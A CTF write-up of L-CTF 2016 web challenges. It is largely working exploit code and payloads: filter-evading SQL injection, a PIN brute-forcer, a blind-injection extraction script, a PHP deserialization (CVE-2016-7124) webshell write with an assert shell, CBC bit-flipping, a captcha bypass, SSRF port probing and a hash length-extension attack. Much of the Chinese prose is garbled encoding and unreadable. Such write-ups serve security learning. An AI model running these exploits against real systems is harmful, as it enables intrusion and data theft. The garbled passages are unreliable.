
L-ctf2016 Writeup

2016/10/03

鍦ㄥぇ瀹堕兘涓虹鍥芥瘝浜插簡鐢熺殑鏃跺欙紝澶╁ぉ閮芥湁浜洪棶鎴戯細浣犲共鍢涘憿锛熷嚭鏉ョ帺鍛鈥.鎴戣〃绀(鈺碘枴鈥)鈺傅鈹烩攣鈹伙紝绋嶅井鏈夌偣鍎块仐鎲剧殑鏄張鍒氬ソ閿欒繃浜嗗皬绀肩墿鐨勮竟缂樼嚎锛屽仛浜2閬撻珮鍒唚eb棰樿繕鎸哄紑蹇冪殑o(^鈻絕)鈹涳紝涓嶈繃xd鐨勬湇鍔″櫒涔熸槸铔帀瀹斥﹂棰橀兘瑕佺垎鐮磋繕娌℃庝箞宕╄繃鈥﹀己鏃犳晫鈥


WEB

web1 Can you get the flag

A little poking around shows the login form is SQL-injectable. The filter strips SQL keywords once, so doubling them (`oorr`, `seleselectct`, `anandd`) survives the stripping, and inline comments `/**/` stand in for spaces:

Password 锛' oorr (seleselectct/**/ sleep(100))#

Error-based injection (the query result is leaked through the `updatexml()` error message):

payload: '/**/anandd/**/updaupdatexmltexml(0,concat(0x27,(seleselectct/**/version())),0)%23

The injection yields an account and password:

admin
we1c0me%_#2&_@LCTF

Logging in is not the end of it. If the purchase quantity is made negative (`selectNum=-1`), the page answers `password wrong` whenever the 4-digit `passwd` is wrong — that is a clean oracle, so brute-force it:

Python brute-force script:
import requests
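def brute_force_password(url='http://web.l-ctf.com:6699/ret.php', width=4, timeout=10):
    """Brute-force the numeric purchase password behind ret.php.

    Buying a negative quantity (selectNum=-1) makes the page answer
    'password wrong' for a wrong passwd; the first candidate whose response
    lacks that marker is taken as the password.

    The original loop used xrange(0, 9999), which never tried 9999; the full
    0000..9999 space is covered here.  Every request carries a timeout so a
    stalled connection cannot hang the whole run.

    Returns (password, response_text), or (None, None) if nothing matched.
    """
    session = requests.Session()
    for candidate in range(10 ** width):  # inclusive of the last value, e.g. 9999
        guess = str(candidate).zfill(width)
        r = session.post(
            url,
            # 'Buy+It' is already form-encoded; requests encodes the '+' again,
            # so the server receives the literal string 'Buy+It'.  Harmless as
            # long as the server only checks that the field is present.
            data={'selectNum': '-1', 'passwd': guess, 'submit': 'Buy+It'},
            timeout=timeout,
        )
        text = r.content.decode('utf-8', 'replace')
        if 'password wrong' not in text:
            print('password is %s %s' % (guess, text))
            return guess, text
        print('trying %s' % guess)
    return None, None


password, _ = brute_force_password()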

Password found:
5487

flag is here: LCTF{Th1nks_@f0r_#your_%supp0rt}

鎴戞帶鍑犱笉涓绘垜鍙婂嚑鍟

Honestly, at first glance the WAF looked airtight — everything seemed filtered and nothing injectable. Seeing how many people had solved it, I guessed sqlmap, ran it, and it actually got through:

Database: xdctfweb150
Table: articles
[4 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| auther | varchar(20) |
| content | text |
| id | int(2) |
| title | varchar(50) |
+---------+-------------+
Database: xdctfweb150
Table: where
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| secret | varchar(80) |
+--------+-------------+
Database: xdctfweb150
Table: where
[1 entry]
+--------------------------------+
| secret |
+--------------------------------+
| LCTF{H0w_D0_You_Bypass_My_w4f} |
+--------------------------------+

I wonder how many of those who solved it actually know why it worked.

The point is that the WAF's block page is returned only after the query has already been executed. So even though the WAF suppresses the response, time-based blind injection still works — the `SLEEP()` delay leaks the data one comparison at a time, and sqlmap gets there after a short run. A WAF that fails open like this is not a control; the query must be blocked before it reaches the database.

payload:

http://web.l-ctf.com:6699/LCTF150/?id=3%20AND%202362%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28table_name%20AS%20CHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%3D0x7864637466776562313530%20LIMIT%200%2C1%29%2C3%2C1%29%29%3E54%29%2CSLEEP%283%29%2C2362%29

Overslept

At first I could not work out why nothing I changed made any difference. A teammate then realised the challenge is built on CVE-2016-7124, a bug that had been widely discussed a couple of days earlier; the 360 write-up of it was misleading, which had thrown me off.

For the detailed analysis, see a teammate's post:
http://lazysheep.cc/2016/09/13/0x22/

Rather than explain it from scratch, here is the source obtained after getting a shell.

index.php

<h1>杩欐槸涓涓悗闂(涓嶈繃濂藉儚涓嶈兘鐩存帴鐢ㄥ晩......</h1>
<hr />
<form action="" method='POST'>
Filename:<input type='text' name='filename' /><br/>
Filedata:<input type='text' name='filedata' /><br/>
<input type="submit" name='submit' />
</form>
<?php
// Bare class: the two properties are attached dynamically below, so a
// serialized instance carries whatever names and values the POST supplied.
class key{}
// Builds a key object from untrusted POST fields and hands its serialized form
// to upload.php through the `key` query string via a meta refresh.  Nothing
// forces the client to go through this page: the serialized string is fully
// attacker-controlled and can be sent to upload.php directly.
if($_POST['filename'] && $_POST['filedata']){
    $key=new key();
    $key->filename=$_POST['filename'];
    $key->filedata=$_POST['filedata'];
    $s=serialize($key);
    // $s is embedded without URL-encoding.
    echo "<meta http-equiv='refresh' content='0.1;url=upload.php?key=".$s."'>";
}
?>

index.php is just a plain serialization step: the two POST fields become properties of a `key` object and the serialized string is passed to upload.php.

<?php
class key{
    var $filename;
    var $filedata;
    // Intended defence: on unserialize(), wipe every property so that
    // __destruct() has nothing to write.  It only helps if __wakeup() actually
    // runs — on PHP builds affected by CVE-2016-7124, a declared property count
    // larger than the number of properties present makes unserialize() skip
    // __wakeup() entirely, leaving filename/filedata intact.
    function __wakeup(){
        echo "Waking up.........<br/>";
        foreach(get_object_vars($this) as $key=>$value){
            $this->$key = null;
            echo $key." => ".$this->$key;
            echo "<br />";
        }
        echo "Finished<br/>";
        echo "<br/>";
    }
    // Runs when the object is destroyed; with the properties intact this is
    // an arbitrary-content file write into ./upload/.
    function __destruct(){
        //Do something
        $this->my_file_put_contents($this->filename,$this->filedata);
    }
    // Writes attacker-controlled $filedata to ./upload/<md5(filename)>.php.
    // $file_path/$data are only used for the emptiness check; the write itself
    // re-reads $this->filename and $this->filedata.
    function my_file_put_contents($file_path,$data){
        if($file_path && $data){
            $rs=file_put_contents('./upload/'.md5($this->filename).'.php',$this->filedata);
            echo $rs." written";
        }
    }
}
$key=$_GET['key'];
// Blacklist for serialized objects.  /O:\d+:/ only matches when a digit
// immediately follows "O:", so a length written as "+3" (O:+3:"key":...) is
// not caught here yet is still accepted by unserialize().
preg_match('/O:\d+:/',$key,$match);
if($match){
    exit("鎹杩欑key鍔犱篃琛<br/>");
}
// unserialize() on untrusted input: any class in scope with __wakeup/__destruct
// becomes a gadget (see class key above).
$Obj=unserialize($key);
?>

payload:

http://web.l-ctf.com:10197/ctf/upload.php?key=O:%2b3:"key":3:{S:8:"filename";s:2:"ss";s:8:"filedata";s:19:"aaasdfasdfasdfasaaa";}

`__wakeup()` is skipped, so a webshell can be written. Two things happen in that payload: `O:+3:` evades the `/O:\d+:/` filter because `\d+` does not match the `+`, and the declared property count (3) is larger than the two properties actually present, which on PHP versions affected by CVE-2016-7124 makes `unserialize()` skip `__wakeup()`. `filename` and `filedata` therefore survive to `__destruct()`, where `my_file_put_contents()` writes them to `./upload/md5(filename).php`.

Once inside there was another problem: there was no flag anywhere under the web root. Now what?

Get around the `opendir` restriction — `DirectoryIterator` over the `glob://` wrapper still lists the directory:

321=$f=[];$d=new DirectoryIterator("glob:///var/www/flag/*");var_dump($d);

鑻忔墦瀛﹀鐨勭綉绔

鑻忔墦瀛﹀寰堟枃鑹猴紝
鎼炰簡涓涓浘鐗囧皬绔欙紝浣嗘槸鏅哄晢缁忓父涓嶄笂绾裤備笉鐭ユ槸涓轰簡鏂逛究鍜嬬殑銆佺粡甯哥暀涓浜涘鎬殑涓滆タ涓嬫潵锛屾潵鍚э紝鐮镐簡浠栬繖涓浘鐗囩珯鐨勫満瀛愶紒锛
http://web.l-ctf.com:14144/

I did not solve this one myself, so what follows is based on a teammate's notes.

First we notice that

`http://web.l-ctf.com:14144/img.php?id=file/5253d1eb29230.jpg` looks like a path-handling issue, and `http://web.l-ctf.com:14144/file/tips.txt` exists.

It could not be read directly. Without knowing what the backend did, supplying `resource=` twice turned out to return the file (my guess at the time was a prefix check; the img.php source below shows the real reason — the greedy `.*` in the regex makes the last `resource=` win, while the `jpg` substring check is satisfied by the first). Payload:

http://shimakaze.labs/lctf/parse.php?id=php://resource=file/5253d1eb29230.jpg/resource=file/tips.txt

Reading tips.txt gives:

admin.php.txt

Admin.php.txt
<?php
error_reporting(0);
$Key = "xxxxxxxxxxxxxxxxx";   // redacted in the handout
$iv = "xxxxxxxxxxxxxxxx";
// Plaintext of the default cookie; the fields the check reads, "num=2015"
// and "uid=4", sit inside it.
$v = "2016niandiqijiequanguowangluoanquandasai0123456789abcdef-->xdctfxdnum=2015auid=4;xdctfxdctf";
$en_Result = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$Key, $v, MCRYPT_MODE_CBC, $iv);
$enc = base64_encode($en_Result);
// The cookie is decrypted but never authenticated (no MAC, no sanity check of
// the decrypted text).  That is what makes CBC bit-flipping possible: flipping
// a bit in ciphertext block i-1 flips the same bit in plaintext block i and
// turns block i-1 into garbage.  ($_COOKIE[user] relies on an undefined
// constant falling back to the string 'user'; the notice is hidden by
// error_reporting(0).)
$en_Data = base64_decode($_COOKIE[user]);
$de_Result = mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$Key, $en_Data, MCRYPT_MODE_CBC, $iv);
$b = array();
$b = isset($_COOKIE[user])?$de_Result:$enc;
// The fields are located with strpos(), so garbage elsewhere in the decrypted
// text does not matter — only the bytes right after "uid=" and "num=" count.
$num1 = substr($b,strpos($b,"uid")+4,1);
$num2 = substr($b,strpos($b,"num")+4,4);
echo '</br><h3>ID: '.$num1."</h3><br>";
// Loose comparison (==); the expected values are plain digits, so "1"/"2016"
// in the flipped plaintext is enough.
if ($num1 == 1 && $num2 == 2016){
    die ("shen mi li wu !");
}
else{
    echo "HELLO CLIENT";
}
setcookie("user",$enc);
?>%

img.php

<?php
// Serves a file named by ?id=... .  The only gate is that the substring "jpg"
// appears somewhere in the parameter — not as the real extension.
if(isset($_GET["id"]) && (strpos($_GET["id"],'jpg') !== false))
{
    // Single-quoted '\n' is the two characters '\' and 'n', not a newline, so
    // trim() strips backslashes and the letter n — almost certainly not intended.
    // The regex is greedy: ".*" runs up to the LAST "resource=", so
    // "php://resource=x.jpg/resource=tips.txt" passes the jpg test above and
    // rewrites id to "tips.txt".
    preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($_GET["id"],'\n'), $match);
    if (isset($match[1]))
        $_GET["id"] = $match[1];
    // Existence is checked relative to "./", but the size/read below use the raw value.
    if (file_exists("./" . $_GET["id"]) == false)
        die("File Not Found");
    header('Content-Type: image/jpg');
    header('Content-Length: '.filesize($_GET["id"]));
    header('Content-Disposition: filename='.$_GET["id"]);
    // Length cap on the rewritten name, checked only after the headers went out.
    if (strlen($_GET["id"])>32){
        die ("Too Long!!!!!");
    }
    else{
        $data = file_get_contents($_GET["id"]);
        echo $data;
    }
}
else
{
    echo "File Not Found";
}
?>

Anyone who has seen it before recognises it at a glance: a CBC byte-flipping attack. The principle is well known (it appeared in 三个白帽 earlier and in HCTF 2015), so only the short version: the cookie is AES-CBC-encrypted but carries no MAC, so flipping a bit in ciphertext block i-1 flips the same bit in decrypted block i — block i-1 turns to garbage, which this code tolerates because it locates the fields with `strpos`.

The crux is here:

$num1 = substr($b,strpos($b,"uid")+4,1);
$num2 = substr($b,strpos($b,"num")+4,4);

鍙鏋勯犲悗16浣嶄腑鐨13bytes涓簎id=1num=2016
灏卞彲浠ユ垚鍔熼氳繃鍒ゆ柇

Run it and you are through; next comes a file upload.

Upload a `.user.ini`,

涓婁紶涓涓悓鍚嶆枃浠

get shell

http://web.l-ctf.com:14144/upload_12b1d89eb3a43eb6220b5952a5a13785/upload/index.php?a=assert
Post: fuckddog=phpinfo();

Headpic

杩欓鍩烘湰鍋氫簡鎴戜竴涓笅鍗堜竴涓櫄涓娾︽渶姘旂殑鏄繖棰樼殑绗竴绗簩姝ュ畬鍏ㄥ垎绂伙紝鎵浠ユ垜浠仛浜嗙浜屾鍚庯紝鍦╢lag鍓嶉潰绛変簡濂戒箙锛屼竴鐩村埌tips鏀句簡鎵嶅弽搴旇繃鏉ユ槸鍋氶敊浜嗛『搴忊﹀彧鍙儨鏈潵鏄兘鎷夸竴琛锛屾渶鍚庡牚鍫嬁涓3琛鈹(锟P 锟)鈹嶁

浜屾娉ㄥ叆

When I saw the hint I was baffled, because in my mind the challenge was SSRF…

Looking carefully at the application logic:

register (INSERT) -> login (SELECT) -> after login a headpic URL is shown (stored? SELECT? or inserted with a default at registration?) -> change headpic (UPDATE)

Even after solving it I cannot be sure the third part exists, but testing shows the fourth step does, and the UPDATE's WHERE clause is `username = $user` — the username stored at registration is reused unescaped, which is a second-order injection.

閭d箞闂鏉ヤ簡鈥﹁繖閲岀殑鍒ゆ柇鏉′欢蹇呴』璇锋眰淇敼鍚庣殑澶村儚鍐呭锛屾潵鍒ゆ柇鐩叉敞璇锋眰鏄惁鎴愬姛锛屼篃灏辨槸璇达紝姣忔娉ㄥ叆鎴戜滑閮藉繀椤昏姹4娆★紝杩樻槸鐩叉敞锛屽綋鐒惰繖閲岃繕鏈変釜闂灏辨槸楠岃瘉鐮佺殑闂

  • Bypassing the captcha

Here 蓝猫 gave me a hand: while I was still working on the captcha, he pointed out that if you register or log in without sending a session cookie, the captcha check never applies.

Easy to see why — whoever wrote the code only considered the normal request flow:

浠g爜涓鑸暱杩欐牱

if(!isset($_SESSION)){
    set up the session;
    then redirect back
}

So registering and logging in without a session cookie is all it takes. (The fix is the usual one: generate the captcha server-side, store it in the session, and reject any submission that does not match — never treat "no session" as "nothing to check".)

Then it was time to write a script. Because this differs from an ordinary blind injection my own tool did not fit, so I wrote another one. It has no binary search, so each character costs up to about 100 probes (four requests each), and the whole extraction was spent tweaking the script to skip filtered words. Fortunately the filter does not rewrite words, so it was workable.

import requests
from bs4 import BeautifulSoup
import base64
import Queue
import threading
def code(s):
    """Fetch the captcha image for a fixed session id and OCR it.

    NOTE(review): `Image` and `pytesseract` are never imported in this file
    (this would need `from PIL import Image` and `import pytesseract`), so
    calling the function raises NameError.  It is only referenced from a
    commented-out line in main() — the captcha turned out to be unnecessary
    once no session cookie is sent.  The PHPSESSID below is a contest-time
    session id and must be replaced with a live one.
    """
    url = "http://web.l-ctf.com:55533/verify.php"
    cookies = {"PHPSESSID": "ljf888c57d6pd9qrcltgrsadd2"}
    code = s.get(url, cookies=cookies)  # local shadows the function name; harmless
    with open("code.png", "wb") as ff:
        ff.write(code.content)
    img = Image.open("code.png")
    code_string = pytesseract.image_to_string(img)
    print code_string
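def register(payload, timeout=10):
    """Register a throw-away account whose username is the injection payload.

    check.php is hit without any session cookie on purpose: the captcha is
    only enforced for requests that already carry a PHPSESSID.  The `register`
    field is sent pre-percent-encoded (it is the UTF-8 of the button label
    '注册'); requests encodes it again, so the server receives the literal
    '%E6%B3%A8%E5%86%8C' — fine as long as it only tests isset().

    A timeout is set so one stalled connection cannot hang the extraction loop.
    Returns the Response so callers can inspect it (the original discarded it).
    """
    url1 = "http://web.l-ctf.com:55533/check.php"
    data = {"user": payload, "pass": "dsa", "typer": "0", "register": "%E6%B3%A8%E5%86%8C"}
    return requests.post(url1, data=data, timeout=timeout)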
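def headpic_bytes(html):
    """Return the decoded payload of the first <img src="data:...;base64,..."> in html.

    Returns b"" when there is no <img>, no src attribute, or no base64 part
    after the comma — the original sliced the src at a fixed offset (23, the
    length of "data:image/jpeg;base64,"), which silently breaks for any other
    MIME type.
    """
    import re
    m = re.search(r'<img[^>]*\ssrc=["\']([^"\']*)', html, re.I)
    if not m:
        return b""
    src = m.group(1)
    if "," not in src:
        return b""
    return base64.b64decode(src.split(",", 1)[1])


def login(payload, timeout=10):
    """Log in as `payload`, point the account's headpic at an attacker URL and
    report whether ucenter.php afterwards embeds a non-empty picture.

    The headpic UPDATE in save.php filters on the stored username, so the
    injected condition inside `payload` decides which rows get rewritten; the
    emptiness of the picture that ucenter.php serves is the blind oracle
    (which side corresponds to "condition true" is decided by test()).

    The session id is taken from the cookie jar filled by the login response
    instead of slicing the raw Set-Cookie header at fixed offsets ([10:-8],
    i.e. assuming exactly "PHPSESSID=<id>; path=/").
    """
    s = requests.Session()
    url1 = "http://web.l-ctf.com:55533/check.php"
    url2 = "http://web.l-ctf.com:55533/save.php"
    url3 = "http://web.l-ctf.com:55533/ucenter.php"
    data = {"user": payload, "pass": "dsa", "typer": "0", "login": "%E7%99%BB%E9%99%86"}
    s.post(url1, data=data, timeout=timeout)
    sess_id = s.cookies.get("PHPSESSID")
    if not sess_id:
        raise RuntimeError("login did not set a PHPSESSID cookie")
    cookies = {"PHPSESSID": sess_id}
    # Host-prefix bypass: the required "http://web.l-ctf.com:55533" is parsed
    # as the userinfo part; the real host is 115.28.78.16.
    data2 = {"headpic": "http://web.l-ctf.com:55533@115.28.78.16/ddog.php"}
    s.post(url2, data=data2, cookies=cookies, timeout=timeout)
    r = s.get(url3, cookies=cookies, timeout=timeout)
    return len(headpic_bytes(r.text)) > 0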
def test(payload):
    """Send one blind-injection probe and return True when login() reports an
    EMPTY headpic for the registered payload (i.e. the negation of login()).

    Spaces are swapped for '/**/' before sending, since plain whitespace is
    presumably filtered; the modified payload is echoed for progress tracking.
    """
    probe = payload.replace(" ", "/**/")
    print(probe)
    register(probe)
    return not login(probe)
def ppayload():
    """Extract the `pass` column of flag_admin_233 one character at a time.

    Each probe asks `ascii(mid(value, pos, 1)) > k` for k scanned upwards over
    `number`; the loop appends chr(k) for the first k at which test() returns
    True (test() is True when login() saw an empty headpic).  Assuming an
    empty headpic means the injected condition was false, the first such k is
    the first k with ascii(c) <= k, i.e. ascii(c) itself when c is in the
    charset -- inferred from the server behaviour, not visible here.

    NOTE(review): a character outside `number` is mis-reported as the next
    charset member above it (or silently dropped if above 'z'), shifting the
    rest of the output.  The 32-character target looks like an MD5 hex digest,
    which fits inside [0-9a-f] -- TODO confirm.  There is no binary search:
    up to len(number) probes x 4 requests per character.

    The commented-out stages below are the schema/table/column enumeration
    that was run first; their results (database web_200, table
    flag_admin_233, column pass, 1 row of length 32) are hard-coded into the
    live code.  `database_number` is assigned but never used.
    """
    # --- stage 1: number of schemas ---
    # for i in xrange(30):
    # payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.SCHEMATA limit 0,1)>" + str(i) + ")#"
    # if test(payload):
    # database_number = i
    # break
    # print "database_number:" + str(database_number)
    database_number = 2
    # --- stage 2: schema name ---
    # for i in range(1,2):
    # for j in xrange(50):
    # payload = "nishigeshenmegui' or ((SELECT length(SCHEMA_NAME) from information_schema.SCHEMATA limit " + str(i) + ",1)>" + str(j) + ")#"
    # if test(payload):
    # database_length = j
    # break
    # print "[*]dababase_length: "+ str(database_length)
    # database = ""
    # for j in xrange(database_length):
    # for r in xrange(7):
    # pass
    # for k in range(30,130):
    # payload = "nishigeshenmegui' or ((select ascii(mid((SELECT SCHEMA_NAME from information_schema.SCHEMATA limit " + str(i) + ",1),"+ str(j) +",1)))>" + str(k) + ")#"
    # if test(payload):
    # database += chr(k)
    # break
    # print "[*]database:"+database
    # --- stage 3: tables of web_200 ---
    # for i in xrange(30):
    # payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit 0,1)>" + str(i) + ")#"
    # if test(payload):
    # table_number = i
    # break
    # print "table_number:" + str(table_number)
    # table_number = 2
    # for i in range(0,table_number):
    # # for j in xrange(50):
    # payload = "nishigeshenmegui' or ((SELECT length(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1)>" + str(j) + ")#"
    # if test(payload):
    # table_length = j
    # break
    # print "[*]table_length: "+ str(table_length)
    # table_length = 14
    # table = ""
    # for j in range(11,table_length):
    # for k in range(50,130):
    # payload = "nishigeshenmegui' or ((select ascii(mid((SELECT TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
    # if test(payload):
    # table += chr(k)
    # print table
    # break
    # # print "[*]table:" + table
    # --- stage 4: columns of flag_admin_233 ---
    # for i in xrange(30):
    # payload = "nishigeshenmegui' or ((SELECT COUNT(*) from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' && TABLE_NAME = 'flag_admin_233' limit 0,1)>" + str(i) + ")#"
    # if test(payload):
    # conlum_number = i
    # break
    # conlum_number = 3
    # print "conlum_number:" + str(conlum_number)
    # for i in range(2,conlum_number):
    # for j in xrange(50):
    # if i == 2:
    # conlum_length = 4
    # break
    # payload = "nishigeshenmegui' or ((SELECT length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1)>" + str(j) + ")#"
    # if test(payload):
    # conlum_length = j
    # break
    # print "[*]conlum_length: "+ str(conlum_length)
    # column = ""
    # for j in range(conlum_length):
    # for k in range(90,130):
    # payload = "nishigeshenmegui' or ((select ascii(mid((SELECT COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA = 'web_200' limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
    # if test(payload):
    # column += chr(k)
    # print column
    # break
    # print "[*]column:" + column
    # --- stage 5: row count ---
    # for i in xrange(30):
    # payload = "nishigeshenmegui' or ((SELECT COUNT(*) from flag_admin_233 limit 0,1)>" + str(i) + ")#"
    # if test(payload):
    # content_number = i
    # break
    # print "content_number:" + str(content_number)
    content_number = 1
    # ord() values of '0'-'9' and 'a'-'z': the candidate charset, scanned ascending.
    number = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122]
    for i in range(0,content_number):
        # --- stage 6: length of pass (result hard-coded below) ---
        # for j in xrange(50):
        # payload = "nishigeshenmegui' or ((SELECT length(pass) from flag_admin_233 limit " + str(i) + ",1)>" + str(j) + ")#"
        # if test(payload):
        # content_length = j
        # break
        content_length =32
        print "[*]content_length: "+ str(content_length)
        content = ""
        for j in range(content_length):
            for k in number:
                # mid() is 1-based, hence j + 1.
                payload = "nishigeshenmegui' or ((select ascii(mid((SELECT pass from flag_admin_233 limit " + str(i) + ",1),"+ str(j + 1) +",1)))>" + str(k) + ")#"
                if test(payload):
                    content += chr(k)
                    print content
                    break
        print "[*]content:" + content
def main():
    """Entry point: create a session (only the disabled captcha step would
    use it) and start the character-by-character extraction."""
    sess = requests.Session()
    # code(sess)  # captcha OCR; not needed when no session cookie is sent
    ppayload()
# Script entry point; main() kicks off the extraction immediately.
if __name__ == '__main__':
    main()

The injection yields:

Database name: web_200
Table count: 2
table
flag_admin_233
User
Flag_admin_233
Id: admin: pass
admin******
Admin: 1admin2016

ssrf

With the username and password in hand, admin.php still would not let us log in; robots.txt then gave a hint:

NEQGM33SM5SXIIDUN4QGIZLMMV2GKIDNPEQHAZLSONXW4YLMEBTGS3DFFR2GQYLUOMQHI33PEBRGCZBMNEQGI33OE52CA53BNZ2CA6LPOUQHI3ZAM5SXIIDTMVRXEZLUL5XGK527NZXXI2LDMUXHA2DQ

瑙ase32寰楀埌

"i forget to delete my personal file,thats too bad,i don't want you to get secret_new_notice.php"

Visiting it directly says the access is not local — so SSRF it is.

娴嬭瘯淇敼鍙戠幇鏈夊墠缂妫鏌

The headpic URL must start with `http://web.l-ctf.com:55533`, but `@` gets around it: in `http://web.l-ctf.com:55533@127.0.0.1:80/` the required prefix is parsed as the userinfo part of the URL and the real host is 127.0.0.1. (A string-prefix check on a URL is never a host allow-list; parse the URL and compare the host component.)

褰撴椂绗竴鍙嶅簲鏄壂鍐呯綉绔彛锛屽鏋滃唴缃戞湁redis浠涔堢殑锛屽彲浠etshell

闄勪笂鎵唴缃戠鍙h剼鏈

import requests
from bs4 import BeautifulSoup
import base64
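# The mandatory prefix "http://web.l-ctf.com:55533" is placed in the userinfo
# part of the URL; the host the server actually connects to is 127.0.0.1.
urll = "http://web.l-ctf.com:55533@127.0.0.1:"
url1 = "http://web.l-ctf.com:55533/save.php"
url2 = "http://web.l-ctf.com:55533/ucenter.php"
cookie = {"PHPSESSID": "ljf888c57d6pd9qrcltgrsadd2"}  # contest-time session id; replace with a live one
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Connection": "keep-alive"}
s = requests.Session()


def probe_port(port, timeout=10):
    """Point the headpic at 127.0.0.1:<port> and return whatever the server
    fetched and embedded as a base64 data URI (b"" if nothing decodable).

    The original used a bare `except:` that rebound the Session object `s` to
    the integer 1, so any further iteration would have crashed; here only the
    expected failures (no <img>/src, no base64 part, undecodable base64) are
    caught and the session is left intact so this can run in a loop.
    """
    import binascii
    data = {"headpic": urll + str(port)}
    s.post(url1, data=data, cookies=cookie, timeout=timeout)
    r = s.get(url2, headers=header, cookies=cookie, timeout=timeout)
    bs0bj = BeautifulSoup(r.text, "lxml")
    try:
        src = bs0bj.img['src']
        return base64.b64decode(src.split(",", 1)[1])
    except (TypeError, KeyError, IndexError, binascii.Error):
        return b""


# Only port 80 was probed in the original run; widen to e.g. range(22, 65535)
# to scan (mind the 1 request pair per port and the server-side timeout).
for port in (80,):
    content = probe_port(port)
    print(content)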

Which returns the hint:

i found that my account is too weak,so i make a trick,add something at the end of username<pre>$user=='admin******'?</pre>

Honestly we reached this step first, so the first instinct was to brute-force the admin suffix; after running for a long time nothing came of it. Passing an array as the parameter instead got the flag.

o(^鈻絕)鈹

浣犱竴瀹氫笉鑳芥潵杩

Nothing to be found on the landing page and no way around directory scanning — and indeed this challenge is about scanning. Scan, scan, and we get:

http://web.l-ctf.com:33333/crossdomain.xml

which points to:

http://xdctfweb.xd-a8.com/

and there we obtain download.php:

<?php
require("common.php");
// Serves www.rar or download.php to a caller presenting md5($secret.$filename).
// The "MAC" is a plain MD5 over secret||filename, so it is open to a hash
// length-extension attack: from the known mac of "download.php" one can
// compute the mac of "download.php" . <MD5 padding> . "www.rar" without ever
// knowing $secret.  The "www.rar" branch is tested first, so that extended
// name serves www.rar.  An HMAC would close this.
function varify_hash($filename,$hash,$secret){
    // strpos() is false when absent, and false > -1 is false under PHP's
    // bool comparison, so this is a plain substring test at any position.
    if(strpos($filename,"www.rar")>-1){
        if($hash === md5($secret.$filename)){
            download("www.rar");
        }
        else
            exit("mac涓嶅锛屼綘鏍规湰涓嶆槸xdsec鐨勪汉銆") ;
    }
    elseif(strpos($filename,"download.php")>-1){
        if($hash === md5($secret.$filename)){
            download("download.php");
        }
        else
            exit("mac涓嶅锛屼綘鏍规湰涓嶆槸xdsec鐨勪汉銆");
    }
    else
        exit("娌℃湁浣犺涓嬭浇鐨勬枃浠躲");
}
// $_GET is already URL-decoded by PHP; the extra urldecode() means a
// double-encoded name is accepted too.  The padding bytes of the
// length-extension payload (%80%00...) only need single encoding.
$filename = urldecode($_GET['filename']);
$hash = $_GET['mac'];
// $secret and download() come from common.php (not shown).
if(!empty($filename) && !empty($hash)){
    varify_hash($filename,$hash,$secret);
}
else
    exit("鍙傛暟涓虹┖");
?>

A friend told me this is a hash length-extension attack; found a tool for it:
http://www.cnblogs.com/pcat/p/5478509.html

Since the secret's length is unknown, script over the candidate lengths:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import hashpumpy
import urllib
import requests
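url = "http://xdctfweb.xd-a8.com/download.php?filename=%s&mac=%s"
# Presumably the mac the site hands out for filename=download.php, i.e.
# md5($secret . "download.php").  Length extension needs only that digest
# and the length of $secret, which is unknown and therefore enumerated.
KNOWN_MAC = "f30a38d3cdcb25cf067468c2f108e1f5"
for key_len in range(52):
    # hashpump returns (new digest, "download.php" + MD5 padding + "www.rar");
    # download.php then finds "www.rar" in the name and serves it when the
    # mac matches.  Each request has a timeout so a stalled one cannot hang the loop.
    mac, fname = hashpumpy.hashpump(KNOWN_MAC, "download.php", "www.rar", key_len)
    resp = requests.get(url % (urllib.quote(fname), mac), timeout=10)
    print(key_len)
    print(resp.content)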
Result:
Payload: http://xdctfweb.xd-a8.com/download.php?filename=download.php%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%F0%00%00%00%00%00%00%00www.rar&mac=1f35a8fa0b3eedd9d25b5fe910ade0e7

Downloading www.rar shows it is password-protected, which felt silly — bolting misc onto web, like bolting pwn onto the later web challenge, adds nothing. Following misc logic anyway, `strings` on the archive reveals something unusual:

Strings www.rar
